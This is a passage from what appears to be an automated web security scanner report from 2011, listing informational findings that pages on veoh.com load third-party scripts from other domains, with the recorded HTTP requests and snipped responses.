       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765039"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.17. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Set-Cookie: veohCookie="VisitorUID=426B478F-39D1-44FA-72ED-6DB69361922A&LastUpdate=03/Feb/2011:12:30:36 -0800&first=0"; domain=.veoh.com; Expires=Mon, 02 Feb 2015 20:30:36 GMT; Path=/
Date: Thu, 03 Feb 2011 20:30:37 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=53
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296765037"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.18. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3digxLTa3XKZOdgQfJltnlDw\\x26amp;sqi\\x3d2\\x26amp;ved\\x3d0CF0QuAIwCQ\\x26amp;q\\x3dsmartdesis\\x26amp;usg\\x3dAFQjCNGfJXOedr8EFUHoDTuNwPlaSxDDIA\\x22\\x3e\\x3cdiv HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:45 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768465"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.19. http://www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v18978294NGnK88j8/x26amp HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:27:42 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 134607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v18978294NGnK88j8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768462"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.20. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207484775fTsGMdN  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207484775fTsGMdN

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v207484775fTsGMdN HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:29:12 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v207484775fTsGMdN&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768553"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.21. http://www.veoh.com/browse/videos/category/action_adventure/watch/v207490874eKBjfZC  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v207490874eKBjfZC

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v207490874eKBjfZC HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:53 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=71
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v207490874eKBjfZC&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768533"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.22. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20749145FCR2QekA  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20749145FCR2QekA

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20749145FCR2QekA HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 133874

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20749145FCR2QekA&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768505"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.23. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20753891TQ237Z7N  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20753891TQ237Z7N HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 134506

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v20753891TQ237Z7N&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768509"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.24. http://www.veoh.com/browse/videos/category/action_adventure/watch/v2075425966g5b8E8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v2075425966g5b8E8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v2075425966g5b8E8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:28:22 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=46
Content-Length: 134905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link href="http://www.veoh.com/veohplayer.swf?permalinkId=v2075425966g5b8E8&amp;player=videodetailsembedded&amp;contentRatingId=1" rel="video_src" type="application/x-shockwave-flash" /><script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="watchOpened">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768502"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

8.25. http://www.veoh.com/browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /browse/videos/category/action_adventure/watch/v20754927ZpAfSEzt HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
